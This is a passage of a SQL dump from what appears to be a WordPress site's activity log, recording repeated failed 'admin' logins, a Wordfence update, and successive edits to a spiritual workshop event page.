247,'server_http_user_agent','Mozilla/5.0'),(214237,35247,'_message_key','user_unknown_login_failed'),(214238,35247,'_server_remote_addr','20.205.9.x'),(214239,35248,'failed_username','admin'),(214240,35248,'server_http_user_agent','Mozilla/5.0'),(214241,35248,'_message_key','user_unknown_login_failed'),(214242,35248,'_server_remote_addr','20.205.9.x'),(214243,35249,'failed_username','admin'),(214244,35249,'server_http_user_agent','Mozilla/5.0'),(214245,35249,'_message_key','user_unknown_login_failed'),(214246,35249,'_server_remote_addr','20.205.9.x'),(214247,35250,'failed_username','admin'),(214248,35250,'server_http_user_agent','Mozilla/5.0'),(214249,35250,'_message_key','user_unknown_login_failed'),(214250,35250,'_server_remote_addr','20.205.9.x'),(214251,35251,'failed_username','admin'),(214252,35251,'server_http_user_agent','Mozilla/5.0'),(214253,35251,'_message_key','user_unknown_login_failed'),(214254,35251,'_server_remote_addr','20.205.9.x'),(214255,35252,'failed_username','admin'),(214256,35252,'server_http_user_agent','Mozilla/5.0'),(214257,35252,'_message_key','user_unknown_login_failed'),(214258,35252,'_server_remote_addr','20.205.9.x'),(214259,35253,'failed_username','admin'),(214260,35253,'server_http_user_agent','Mozilla/5.0'),(214261,35253,'_message_key','user_unknown_login_failed'),(214262,35253,'_server_remote_addr','20.205.9.x'),(214263,35254,'failed_username','admin'),(214264,35254,'server_http_user_agent','Mozilla/5.0'),(214265,35254,'_message_key','user_unknown_login_failed'),(214266,35254,'_server_remote_addr','20.205.9.x'),(214267,35255,'failed_username','admin'),(214268,35255,'server_http_user_agent','Mozilla/5.0'),(214269,35255,'_message_key','user_unknown_login_failed'),(214270,35255,'_server_remote_addr','20.205.9.x'),(214271,35256,'failed_username','admin'),(214272,35256,'server_http_user_agent','Mozilla/5.0'),(214273,35256,'_message_key','user_unknown_login_failed'),(214274,35256,'_server_remote_addr','20.205.9.x'),(214275,35257,'failed_username','admin'),(214276,35257,'server_http_user_agent','Mozilla/5.0'),(214277,35257,'_message_key','user_unknown_login_failed'),(214278,35257,'_server_remote_addr','20.205.9.x'),(214279,35258,'failed_username','admin'),(214280,35258,'server_http_user_agent','Mozilla/5.0'),(214281,35258,'_message_key','user_unknown_login_failed'),(214282,35258,'_server_remote_addr','20.205.9.x'),(214283,35259,'failed_username','admin'),(214284,35259,'server_http_user_agent','Mozilla/5.0'),(214176,35234,'server_http_user_agent','Mozilla/5.0'),(214177,35234,'_message_key','user_unknown_login_failed'),(214178,35234,'_server_remote_addr','20.205.9.x'),(214179,35235,'failed_username','admin'),(214180,35235,'server_http_user_agent','Mozilla/5.0'),(214181,35235,'_message_key','user_unknown_login_failed'),(214182,35235,'_server_remote_addr','20.205.9.x'),(214183,35236,'failed_username','admin'),(214184,35236,'server_http_user_agent','Mozilla/5.0'),(214185,35236,'_message_key','user_unknown_login_failed'),(214186,35236,'_server_remote_addr','20.205.9.x'),(214187,35237,'failed_username','admin'),(214188,35237,'server_http_user_agent','Mozilla/5.0'),(214189,35237,'_message_key','user_unknown_login_failed'),(214190,35237,'_server_remote_addr','20.205.9.x'),(214191,35238,'failed_username','admin'),(214192,35238,'server_http_user_agent','Mozilla/5.0'),(214193,35238,'_message_key','user_unknown_login_failed'),(214194,35238,'_server_remote_addr','20.205.9.x'),(214195,35239,'failed_username','admin'),(214196,35239,'server_http_user_agent','Mozilla/5.0'),(214197,35239,'_message_key','user_unknown_login_failed'),(214198,35239,'_server_remote_addr','20.205.9.x'),(214199,35240,'failed_username','admin'),(214200,35240,'server_http_user_agent','Mozilla/5.0'),(214201,35240,'_message_key','user_unknown_login_failed'),(214202,35240,'_server_remote_addr','20.205.9.x'),(214203,35241,'failed_username','admin'),(214204,35241,'server_http_user_agent','Mozilla/5.0'),(214205,35241,'_message_key','user_unknown_login_failed'),(214206,35241,'_server_remote_addr','20.205.9.x'),(214207,35242,'failed_username','admin'),(214208,35242,'server_http_user_agent','Mozilla/5.0'),(214209,35242,'_message_key','user_unknown_login_failed'),(214210,35242,'_server_remote_addr','20.205.9.x'),(214211,35243,'failed_username','admin'),(214212,35243,'server_http_user_agent','Mozilla/5.0'),(214213,35243,'_message_key','user_unknown_login_failed'),(214214,35243,'_server_remote_addr','20.205.9.x'),(214215,35244,'plugin_slug','wordfence'),(214216,35244,'request','{\n    \"doing_wp_cron\": \"1695744761.6983869075775146484375\"\n}'),(214217,35244,'plugin_name','Wordfence Security'),(214218,35244,'plugin_title','<a href=\"http://www.wordfence.com/\">Wordfence Security</a>'),(214219,35244,'plugin_description','Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>'),(214220,35244,'plugin_author','<a href=\"http://www.wordfence.com/\">Wordfence</a>'),(214221,35244,'plugin_version','7.10.4'),(214222,35244,'plugin_url','http://www.wordfence.com/'),(214223,35244,'plugin_prev_version','7.10.3'),(214224,35244,'_message_key','plugin_updated'),(214225,35244,'_wp_cron_running','true'),(214226,35244,'_server_remote_addr','173.231.231.x'),(214227,35245,'failed_username','admin'),(214228,35245,'server_http_user_agent','Mozilla/5.0'),(214229,35245,'_message_key','user_unknown_login_failed'),(214170,35232,'_server_remote_addr','20.205.9.x'),(214171,35233,'failed_username','admin'),(214172,35233,'server_http_user_agent','Mozilla/5.0'),(214173,35233,'_message_key','user_unknown_login_failed'),(214174,35233,'_server_remote_addr','20.205.9.x'),(214175,35234,'failed_username','admin'),(214169,35232,'_message_key','user_unknown_login_failed'),(214163,35231,'failed_username','admin'),(214164,35231,'server_http_user_agent','Mozilla/5.0'),(214165,35231,'_message_key','user_unknown_login_failed'),(214166,35231,'_server_remote_addr','20.205.9.x'),(214167,35232,'failed_username','admin'),(214168,35232,'server_http_user_agent','Mozilla/5.0'),(214159,35230,'_user_login','john-admin-96'),(214160,35230,'_user_email','nadazipought@zilch.org'),(214161,35230,'_server_remote_addr','174.16.128.x'),(214162,35230,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214150,35230,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go?&nbsp; &nbsp; &nbsp;</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What do you want to do?&nbsp; &nbsp; &nbsp;</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214151,35230,'post_prev_post_status','draft'),(214152,35230,'post_new_post_status','publish'),(214153,35230,'post_prev_post_date','2023-09-26 07:44:11'),(214154,35230,'post_new_post_date','2023-09-26 07:44:26'),(214155,35230,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(214156,35230,'post_new_post_date_gmt','2023-09-26 13:44:26'),(214157,35230,'_message_key','post_updated'),(214158,35230,'_user_id','15'),(214137,35229,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go?&nbsp; &nbsp; &nbsp;</span></strong><strong><span style=\"font-size: 14pt;\">What do you want to do?&nbsp; &nbsp; &nbsp;</span></strong><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214139,35229,'post_new_post_date','2023-09-26 07:44:11'),(214138,35229,'post_prev_post_date','2023-09-26 07:43:46'),(214140,35229,'_message_key','post_updated'),(214141,35229,'_user_id','15'),(214142,35229,'_user_login','john-admin-96'),(214143,35229,'_user_email','nadazipought@zilch.org'),(214144,35229,'_server_remote_addr','174.16.128.x'),(214145,35229,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214146,35230,'post_id','269118'),(214147,35230,'post_type','mec-events'),(214148,35230,'post_title','Manifest Your Heart’s Desire'),(214149,35230,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go?&nbsp; &nbsp; &nbsp;</span></strong><strong><span style=\"font-size: 14pt;\">What do you want to do?&nbsp; &nbsp; &nbsp;</span></strong><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214099,35226,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Where do you want to go? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What do you want to do? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Who do you want to be? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is your biggest dream? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214136,35229,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go? </span></strong></p>\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What do you want to do? </span></strong></p>\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(214133,35229,'post_id','269118'),(214134,35229,'post_type','mec-events'),(214135,35229,'post_title','Manifest Your Heart’s Desire'),(214131,35228,'_server_remote_addr','174.16.128.x'),(214132,35228,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214130,35228,'_user_email','nadazipought@zilch.org'),(214127,35228,'_message_key','post_updated'),(214128,35228,'_user_id','15'),(214129,35228,'_user_login','john-admin-96'),(214126,35228,'post_meta_added','78'),(214125,35228,'post_new_thumb_title','GoldenHeart2'),(214124,35228,'post_new_thumb_id','269119'),(214123,35228,'post_title','Manifest Your Heart’s Desire'),(214121,35228,'post_id','269118'),(214122,35228,'post_type','mec-events'),(214120,35227,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214119,35227,'_server_remote_addr','174.16.128.x'),(214116,35227,'_user_id','15'),(214117,35227,'_user_login','john-admin-96'),(214118,35227,'_user_email','nadazipought@zilch.org'),(214115,35227,'_message_key','post_updated'),(214114,35227,'post_new_post_date','2023-09-26 07:43:28'),(214113,35227,'post_prev_post_date','2023-09-26 07:42:27'),(214112,35227,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What do you want to do? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214110,35227,'post_title','Manifest Your Heart’s Desire'),(214111,35227,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Where do you want to go? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What do you want to do? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Who do you want to be? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is your biggest dream? </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214109,35227,'post_type','mec-events'),(214108,35227,'post_id','269118'),(214107,35226,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214104,35226,'_user_login','john-admin-96'),(214105,35226,'_user_email','nadazipought@zilch.org'),(214106,35226,'_server_remote_addr','174.16.128.x'),(214103,35226,'_user_id','15'),(214102,35226,'_message_key','post_updated'),(214101,35226,'post_new_post_date','2023-09-26 07:42:27'),(214100,35226,'post_prev_post_date','2023-09-26 07:42:25'),(213967,35214,'post_id','269118'),(214098,35226,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Where do you want to go? </span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What do you want to do? </span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Who do you want to be? </span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What is your biggest dream? </span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(214096,35226,'post_type','mec-events'),(214097,35226,'post_title','Manifest Your Heart’s Desire'),(214095,35226,'post_id','269118'),(214094,35225,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214093,35225,'_server_remote_addr','174.16.128.x'),(214092,35225,'_user_email','nadazipought@zilch.org'),(214091,35225,'_user_login','john-admin-96'),(214090,35225,'_user_id','15'),(214089,35225,'_message_key','post_updated'),(214087,35225,'post_new_thumb_title','GoldenHeart2'),(214088,35225,'post_meta_added','78'),(214086,35225,'post_new_thumb_id','269119'),(214085,35225,'post_title','Manifest Your Heart’s Desire'),(214083,35225,'post_id','269118'),(214084,35225,'post_type','mec-events'),(214082,35224,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214081,35224,'_server_remote_addr','174.16.128.x'),(214080,35224,'_user_email','nadazipought@zilch.org'),(214079,35224,'_user_login','john-admin-96'),(214078,35224,'_user_id','15'),(214077,35224,'_message_key','post_updated'),(214076,35224,'post_new_post_date','2023-09-26 07:40:59'),(214075,35224,'post_prev_post_date','2023-09-26 07:37:46'),(214074,35224,'post_title','Manifest Your Heart’s Desire'),(214073,35224,'post_type','mec-events'),(214072,35224,'post_id','269118'),(214071,35223,'_server_remote_addr','20.205.9.x'),(214070,35223,'_message_key','user_unknown_login_failed'),(214069,35223,'server_http_user_agent','Mozilla/5.0'),(214068,35223,'failed_username','admin'),(214057,35221,'_server_remote_addr','174.16.128.x'),(214058,35221,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214059,35222,'term_id','200'),(214060,35222,'term_name','Longmont Public Library'),(214061,35222,'term_taxonomy','mec_location'),(214062,35222,'_message_key','created_term'),(214063,35222,'_user_id','15'),(214064,35222,'_user_login','john-admin-96'),(214065,35222,'_user_email','nadazipought@zilch.org'),(214066,35222,'_server_remote_addr','174.16.128.x'),(214067,35222,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit-tags.php?taxonomy=mec_location&post_type=mec-events'),(214048,35221,'post_title','Manifest Your Heart’s Desire'),(214049,35221,'post_prev_post_date','2023-09-26 07:35:05'),(214050,35221,'post_new_post_date','2023-09-26 07:37:46'),(214051,35221,'post_new_thumb_id','269119'),(214052,35221,'post_new_thumb_title','GoldenHeart2'),(214053,35221,'_message_key','post_updated'),(214054,35221,'_user_id','15'),(214055,35221,'_user_login','john-admin-96'),(214056,35221,'_user_email','nadazipought@zilch.org'),(214047,35221,'post_type','mec-events'),(214046,35221,'post_id','269118'),(214045,35220,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214043,35220,'_user_email','nadazipought@zilch.org'),(214044,35220,'_server_remote_addr','174.16.128.x'),(214042,35220,'_user_login','john-admin-96'),(214041,35220,'_user_id','15'),(214040,35220,'_message_key','attachment_created'),(214039,35220,'attachment_parent_post_type','mec-events'),(214038,35220,'attachment_parent_title','Manifest Your Heart’s Desire'),(214037,35220,'attachment_parent_id','269118'),(214036,35220,'attachment_filesize','10404'),(214035,35220,'attachment_mime','image/webp'),(214034,35220,'attachment_filename','GoldenHeart2.webp'),(214032,35220,'attachment_id','269119'),(214033,35220,'attachment_title','GoldenHeart2'),(214031,35220,'post_type','attachment'),(214022,35219,'post_title','Manifest Your Heart’s Desire'),(214023,35219,'post_prev_post_date','2023-09-26 07:34:59'),(214024,35219,'post_new_post_date','2023-09-26 07:35:05'),(214025,35219,'_message_key','post_updated'),(214026,35219,'_user_id','15'),(214027,35219,'_user_login','john-admin-96'),(214028,35219,'_user_email','nadazipought@zilch.org'),(214029,35219,'_server_remote_addr','174.16.128.x'),(214030,35219,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214018,35218,'_server_remote_addr','174.16.128.x'),(214019,35218,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214020,35219,'post_id','269118'),(214021,35219,'post_type','mec-events'),(214017,35218,'_user_email','nadazipought@zilch.org'),(214016,35218,'_user_login','john-admin-96'),(214015,35218,'_user_id','15'),(214014,35218,'_message_key','post_updated'),(214012,35218,'post_prev_post_date','2023-09-26 07:34:28'),(214013,35218,'post_new_post_date','2023-09-26 07:34:59'),(214011,35218,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Where do you want to go? What do you want to do? Who do you want to be? What is your biggest dream? Have you decided to go for it?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214009,35218,'post_title','Manifest Your Heart’s Desire'),(214010,35218,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Where do you want to go? What do you want to do? Who do you want to be? What is your biggest dream? Have you decided to go for it?</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with 